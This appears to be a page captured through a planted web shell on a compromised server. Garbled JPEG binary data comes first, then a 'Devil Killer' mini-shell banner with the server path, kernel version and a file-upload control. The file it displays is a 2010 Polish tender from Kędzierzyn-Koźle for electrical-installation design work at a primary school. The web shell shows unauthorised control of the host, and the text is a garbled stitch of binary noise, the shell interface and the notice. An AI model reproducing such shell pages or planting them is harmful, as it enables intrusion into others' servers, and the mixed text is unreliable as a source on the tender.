JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/74349-N-2010.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Dokumentacja przebudowy instalacji elektrycznych w Szkole Podstawowej nr 5 w Kędzierzynie-Koźlu</b><br>
<b>Numer ogłoszenia: 74349 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kędzierzyn Koźle, Urząd Miasta, Wydział Inwestycji , Ul. Piramowicza 32, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. (077) 405 03 80, faks (077) 405 03 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kedzierzynkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja przebudowy instalacji elektrycznych w Szkole Podstawowej nr 5 w Kędzierzynie-Koźlu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Cel i uwarunkowania inwestycji, do której odnosi się zamówienie publiczne

1.	Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług projektowych związanych z  przebudową instalacji elektrycznych w budynku Szkoły Podstawowej nr 5 w Kędzierzynie-Koźlu.
2.	Inwestycja, do której odnosi się niniejsze zamówienie publiczne zlokalizowana jest w Kędzierzynie-Koźlu przy ul.Kościuszki 41 i na działce oznaczonej numerem 808 (nie wyklucza się dodatkowych działek związanych z przyłączeniem obiektu do sieci).
3.	Gmina Kędzierzyn Koźle na uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX_98_2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.), co oznacza, że ustalenie przeznaczenia terenu, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów zagospodarowania i warunków zabudowy następuje właśnie w m.p.z.p. 
4.	Zgodnie z zapisami m.p.z.p. teren inwestycji nie leży w strefie  ochrony konserwatorskiej, zagrożenia przeciwpowodziowego oraz obiekt nie jest wpisany do rejestru zabytków województwa opolskiego.

II.	Charakterystyka przedmiotu zamówienia 

1.	Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji rozwiązującej problemy związane z przebudową instalacji elektrycznych w Szkole Podstawowej nr 5 w Kędzierzynie-Koźlu oraz uzyskanie wszystkich wymaganych przepisami prawa uzgodnień, opinii czy decyzji.

Kubatura obiektu : 17 200 m3, pow. zabudowy 1050 m2.
W 2008 r. szkole został wyremontowany zespół żywieniowy i w zakresie instalacji elektrycznych należy przyłączyć instalacje elektryczne kuchni i jej zaplecza do nowoprojektowanych.
Mieszkanie służbowe winno mieć osobne instalacje wraz z osobnym licznikiem.
W bieżącym roku będzie budowana sala gimnastyczna w systemie - zaprojektuj i zbuduj-, w związku z tym na bieżąco należy koordynować projektowanie instalacji z wykonawcą sali.
	
2.	Przedmiot zamówienia określony w pkt. 1 obejmuje następujące fazy projektowania:
1)	wykonanie opracowań przedprojektowych 
2)	opracowanie dokumentacji projektowej i uzyskanie wszystkich wymaganych przepisami prawa uzgodnień, opinii czy decyzji, dokumentacji kosztorysowej oraz specyfikacji technicznej.

3.	Założenia do projektowania:
1)	Dokumentacja musi być opracowana w sposób kompleksowy zgodny z ustaleniami określonymi w miejscowym planie zagospodarowania przestrzennego miasta Kędzierzyna-Koźla, wymaganiami niniejszego OPISU, wymaganiami ustaw, przepisami i zasadami wiedzy technicznej, przy czym w przypadku zmiany w trakcie wykonywania zamówienia przepisów prawa, norm, normatywów, wzorów, instrukcji lub wytycznych mających zastosowanie do opracowań i czynności składających się na przedmiot zamówienia Wykonawca zobowiązany jest do dostosowania tych opracowań i czynności do wprowadzanych zmian.
2)	Dokumentacja powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć i będzie stanowić opis przedmiotu zamówienia na roboty budowlane w oparciu o ustawę PZP oraz podstawę realizacji pełnego zakresu robót budowlanych niezbędnego dla użytkowania obiektu zgodnie z przeznaczeniem.
Projekt budowlany, będący częścią składową dokumentacji projektowej, musi umożliwić Zamawiającemu uzyskanie pozwolenia na budowę.
3)	Zamawiający informuje, że preferuje nowoczesność w odniesieniu do rozwiązań technologicznych i materiałowych, spełniających wymagania funkcjonalno-użytkowe i programowe określone przez Użytkownika, bądź inną jednostkę wydającą warunki przyłączenia obiektu do sieci lub uzgadniającą proponowane rozwiązania.
4)	Dokumentacja projektowa w swej treści powinna określać technologię robót, materiały, maszyny i urządzenia w sposób nieutrudniający uczciwej konkurencji.
5)	Dokumentacja projektowa powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii, urządzeń i wyposażenia.
6)	Zamawiający dopuszcza po wcześniejszym uzyskaniu jego akceptacji, wskazanie w dokumentacji projektowej na znak towarowy, patent lub pochodzenie z uzasadnionych względów technologicznych, ekonomicznych lub organizacyjnych, albo - jeżeli obowiązek taki wynika z odrębnych przepisów. W takim przypadku wskazaniu muszą towarzyszyć wyrazy -lub równoważny-.

III.	Szczegółowy opis przedmiotu zamówienia

1.	W ramach przedmiotu zamówienia należy wykonać następujące opracowania:

A.	Opracowania przedprojektowe, na które składają się:

1)	inwentaryzacja budowlano-instalacyjna
- dokonanie oględzin i pomiarów z natury (z wykonaniem ewentualnych pomocniczych zdjęć fotograficznych), sporządzenie rysunków w podstawowej skali 1_100 i opisu technicznego, przedstawiających aktualny stan inwentaryzowanego budynku w zakresie:
a)	budowlanym, tj. architektoniczno-konstrukcyjnym, obejmującym rzuty, przekroje i elewacje,
b)	instalacyjnym, obejmującym rozmieszczenie urządzeń i przewodów instalacyjnych z odpowiednim wymiarowaniem i opisaniem,
c)	odkucia i odkrywki elementów konstrukcyjnych i instalacji;


B.	Dokumentacja projektowa, zgodna z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, składającą się z:

1)	projektu budowlanego - w zakresie zgodnym z m.p.z.p., ustawą Prawo Budowlane oraz szczegółowości zgodnej z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego.
      Powinien zawierać m.in.:
a)	porozumienia, zgody lub pozwolenia oraz warunki techniczne i realizacyjne związane z przyłączeniem obiektu do istniejących sieci energetycznych, teletechnicznych,
b)	dodatkowe wytyczne inwestorskie i uwarunkowania realizacyjne związane z realizacją i jej przeprowadzeniem;

2)	projektów wykonawczych, w zakresie o którym mowa w § 5 rozporządzenia powołanego w punkcie 1.B:
a)	związane z ewentualną przebudową uzbrojenia podziemnego na działce, dotyczące sieci: wodociągowej, kanalizacyjnej, gazowej, cieplnej, technologicznej, energetycznych, telekomunikacyjnych lub układu komunikacyjnego,
b)	ewentualnie przyłączy do sieci energetycznej,
c)	instalacji elektrycznych, takich jak:
o	oświetlenia miejsc pracy i oświetlenia awaryjnego,
o	oświetlenia nocnego,
o	oświetlenia zewnętrznego,
o	gniazd wtyczkowych na napięcie 24 V, 230 VAC , 400 VAC i 400 VAC z wyłącznikiem,
o	połączeń wyrównawczych,
o	uziemiające,
o	ochrony  przepięciowej, ochrony od porażeń prądem, 
o	sterowania wentylacji lub klimatyzacji,
o	sterowania klapami p.poż. w kanałach wentylacyjnych lub klimatyzacyjnych,
o	zasilania gniazd komputerowych z układem zasilania gwarantowanego UPS małej mocy,
w tym projektowanie rozdzielnic kondygnacyjnych odbiorczych (bezpiecznikowych) i licznikowych, zasilających bezpośrednio odbiorniki i gniazda (obwody z odbiornikami i gniazdami), jak również projektowanie kablowych wewnętrznych linii zasilających te rozdzielnice
d)	instalacji elektrycznych 3-fazowych,
e)	instalacje pomiarów, automatyki, sterowania i sygnalizacji,
f)	 instalacji teletechnicznych, takich jak:
o	domofonowa, .
o	zegarowa (tzw. elektryczna woźna),
o	telefoniczna standardową,
o	sygnalizacji alarmu włamania lub napadu (czujniki ruchu),
o	systemu sygnalizacji wykrywania pożaru,
o	rozgłaszania przewodowego,
o	telewizja dozorowa CCTV zewnętrzna i wewnętrzna (w tym również obwód z projektowanej sali gimnastycznej),
o	anten zbiorczych - radiowo-telewizyjnych,
w tym projektowanie centralek teletechnicznych,.

3)	wszystkich niezbędnych opinii, uzgodnień i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów oraz wzajemnie skoordynowanie techniczne opracowań projektowych wykonanych przez osoby posiadające uprawnienia budowlane do projektowania w odpowiedniej specjalności, zapewniające uwzględnienie zawartych w przepisach zasad bezpieczeństwa i ochrony zdrowia w procesie budowy, z uwzględnieniem specyfiki projektowanego obiektu budowlanego;

4)	przedmiarów robót, w zakresie o którym mowa w § 6-10 rozporządzenia powołanego w punkcie 1.B;

5)	informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianą w planie bezpieczeństwa i ochrony zdrowia ze wskazaniem w szczególności, czy zakres robót obejmuje jeden z rodzajów wymienionych w art. 21a ust.2 ustawy Prawo Budowlane. Informacja winna uwzględniać warunki rozporządzenia Ministra Infrastruktury w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia.

C.	Specyfikacje techniczne wykonania i odbioru robót, w zakresie o którym mowa w rozdziale 3 rozporządzenia powołanego w punkcie 1.B, powinny ściśle odpowiadać pracom związanym z realizacją inwestycji.

D.	Kosztorys inwestorski, opracowany na zasadach określonych w rozporządzeniu Ministra Infrastruktury w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym wraz z zestawieniem wartości poszczególnych branż.
Na podstawie rozporządzenia RM z dnia 03.07.2006r. w sprawie szczegółowego sposobu i trybu finansowania inwestycji z budżetu państwa (Dz.U. z 2006r. Nr 120, poz. 831) Zamawiający wymaga, aby w kosztorysie inwestorskim uwzględniony był podział kosztów w układzie następujących grup robót:
1)	(ewentualnie) przygotowanie terenu, 
2)	przyłączenie obiektów do sieci,
3)	instalacje,
4)	ewentualnie szkolenia, rozruch.

2.	Przedmiot zamówienia obejmuje również wykonanie następujących czynności:
1)	uzyskanie od jednostki geodezyjno-kartograficznej map do celów projektowych, ewidencyjnych oraz wykazu właścicielu (w przypadku projektowania nowego przyłącza),
2)	uzyskanie zapewnień dostawy i odbioru mediów oraz niezbędnych warunków przyłączenia do sieci, 
3)	(ewentualne) wykonanie inwentaryzacji zieleni dla potrzeb uzyskania zgody na jej usunięcie w zakresie kolidującym z projektowaną instalacją,
4)	uzyskanie wszystkich wymaganych prawem uzgodnień, opinii i sprawdzeń, w tym uzgodnienie z użytkownikiem obiektu,
5)	uzyskanie podpisania -Umów korzystania z nieruchomości na cele budowlane- wg wzorów dostarczanych przez Zamawiającego,
6)	sporządzenie nie wymienionych imiennie opracowań, a niezbędnych z punktu widzenia kompletności przedmiotu zamówienia lub jego części składowej pod kątem uzyskania decyzji organów administracji państwowej i samorządowej czy innych jednostek branżowo uzgadniających opracowanie

3.	Przedmiot zamówienia należy skompletować w ilości:
1)	opracowania przedprojektowe, w tym:
a)	inwentaryzacja								- 3 egz.
2)	dokumentacja projektowa, składająca się z: 
a)	projektu budowlanego złożonego z części:				- 5 egz.  
a.1. projektu zagospodarowania terenu 
a.2. projektu architektoniczno - budowlany
a.3. zbioru uzyskanych opinii, uzgodnień i sprawdzeń projektu
b)	informacji dotyczącej bezpieczeństwa i ochrony zdrowia		- 5 egz.                                                                                 
c)	projektów wykonawczych dla poszczególnych branż			- 3 egz.
d)	przedmiarów robót							- 3 egz.
3)	specyfikacja techniczna wykonania i odbioru robót budowlanych		- 3 egz.    
4)	kosztorys inwestorski wraz z zestawieniem wszystkich branż		- 2 egz.

Powyższe ilości egzemplarzy nie uwzględniają ilości opracowań niezbędnych do uzyskania   uzgodnień, opinii itp.
4.	Zamawiający dodatkowo wymaga, aby:
1)	inwentaryzację przygotować w teczkach formatu A4, zawierających opis oraz luźno poskładane rysunki, sporządzone w czytelnej grafice kolorowej, umożliwiającej reprodukcję,
2)	do pierwszego egzemplarza PB (egz. Inwestora) dołączyć oryginały wszystkich uzyskanych warunków, uzgodnień, opinii czy sprawdzeń dokumentacji,
3)	do drugiego egzemplarza PB (egz. Starostwa) dołączyć kopie powyższych dokumentów poświadczone czytelnie przez Wykonawcę -za zgodność z oryginałem- , kopię mapy do celów projektowych z oryginalnymi pieczątkami ośrodka dokumentacji geodezyjno-kartograficznego oraz oryginały zaświadczeń z Izby (dla projektanta i sprawdzającego) bądź jego kopię potwierdzoną urzędowo (przez Izbę lub notariusza),
4)	projekty wykonawcze (dla każdej branży osobny) przygotować w teczkach zawierających opis, zestawienia podstawowych materiałów wraz z charakterystyką techniczną oraz luźno poskładane rysunki,
5)	dokumentację przedprojektową przekazać w kompletach opakowanych osobno w teczki kartonowe z przyklejoną odpowiednią stroną tytułową (nie stosować kartonów archiwizacyjnych),
6)	dokumentację projektową przekazać w kompletach opakowanych osobno w teczki kartonowe  (nie stosować kartonów archiwizacyjnych) z przyklejoną stroną tytułową o treści opisanej w rozporządzeniu powołanym w pkt.1.C.

5.	Dodatkowo niżej wymienione opracowania winne być przygotowane i przekazane każde osobno Zamawiającemu w 1 egz. na nośniku elektronicznym z odpowiednimi opisami: 
1)	inwentaryzacja - w formacie .pdf ,
1)	projekt budowlany umieszczony w jednym katalogu; projekty wykonawcze umieszczone w drugim katalogu; wszystkie uzgodnienia i dokumenty (za wyjątkiem wypisu i wyrysu z m.p.z.p., wypisów z rejestru gruntów oraz załączników graficznych do uzyskanych warunków i uzgodnień) umieszczony w trzecim katalogu - w formacie .pdf,
2)	specyfikacje techniczne wykonania i odbioru robót;  - w formacie .pdf,
3)	przedmiary robót - w formacie .pdf,
4)	kosztorysy inwestorskie (w tym również przedmiar) - w programie Norma lub innym kompatybilnym z Normą w systemie Windows.

6.	Jeżeli dokument opracowywany jest w środowisku np. Microsoft Word, Open Office, bądź w programach CADowskich należy użyć programu, który bezpośrednio eksportuje, wydrukuje ten dokument do pliku PDF. Można użyć do tego programu np. PDF Creator. Zapobiegnie to konieczności skanowania dokumentu oraz w znaczącym stopniu zmniejszy wielkość wynikowego pliku.
Jeżeli skanowania nie da się uniknąć skaner należy ustawić : rozdzielczość 300dpi, tryb skanowania czarno-biały (1 bit), plik zapisać w PDF; zeskanowany dokument (1 strona) formatu A4 powinien mieć objętość ok. 65KB.

7.	Każdy dokument lub uzgodnienie wielostronicowe należy skanować do jednego pliku.

8.	Opis poszczególnych plików na nośniku elektronicznym musi jednoznacznie określać, co dany plik zawiera. Jeśli chodzi o rysunki proponuje się następujące oznaczenia:
1)	inwentaryzacja             	I.1- piwnica, I.2-parter itd
2)	instalacje elektryczne		E.1-piwnica, E.2-parter, .. , E.7-schemat TG, itd.
Proponowane oznaczenia należy odpowiednio dostosować do opracowań w poszczególnych fazach projektowania - mają być niepowtarzalne w celu ich jednoznacznej identyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Zamawiający oceni jako spełniających warunki udziału w postępowaniu tych Wykonawców, którzy posiadają doświadczenie w projektowaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, bądź w okresie prowadzonej działalności, jeżeli jest on krótszy niż wskazany, nie mniej niż dwóch usług, której przedmiotem było/jest zamówienie o podobnym charakterze jak w niniejszym zamówieniu.
Zamawiający za podobne w rozumieniu niniejszego zapisu uważać będzie zaprojektowanie budowy lub przebudowy instalacji elektrycznych obiektu użyteczności publicznej o kubaturze nie mniejszej niż 15 000 m3 każdy .
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oceniane będzie łączne spełnienie powyższych warunków udziału w postępowaniu przez wszystkich tych Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>5.	Zamawiający dopuszcza możliwość istotnej zmiany zawartej umowy w sprawie zamówienia publicznego w następujących wyjątkowych okolicznościach, których przed zawarciem umowy nie dało się przewidzieć, a mają one wpływ na termin wykonania zamówienia:
1)	wystąpienie siły wyższej,
2)	przedłużające się ponad 30 dni kalendarzowych procedury uzgadniania przedmiotu zamówienia, a które nie są spowodowane działaniem lub brakiem działania Wykonawcy, uniemożliwiające kontynuowanie lub jego zakończenie,
3)	udzielenie zamówienia dodatkowego, powodującego wstrzymanie realizacji przedmiotu zamówienia podstawowego,
4)	niedopełnienie przez Zamawiającego jego obowiązków wynikających z umowy, w tym zwlekanie ponad 30 dni kalendarzowych z zapłatą faktur częściowych, mimo dodatkowego wezwania ze strony Wykonawcy,
5)	zmiany nazwy lub adresu Wykonawcy spowodowane zmianą formy organizacyjno-prawnej, przekształceniem lub połączeniem z inną firmą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
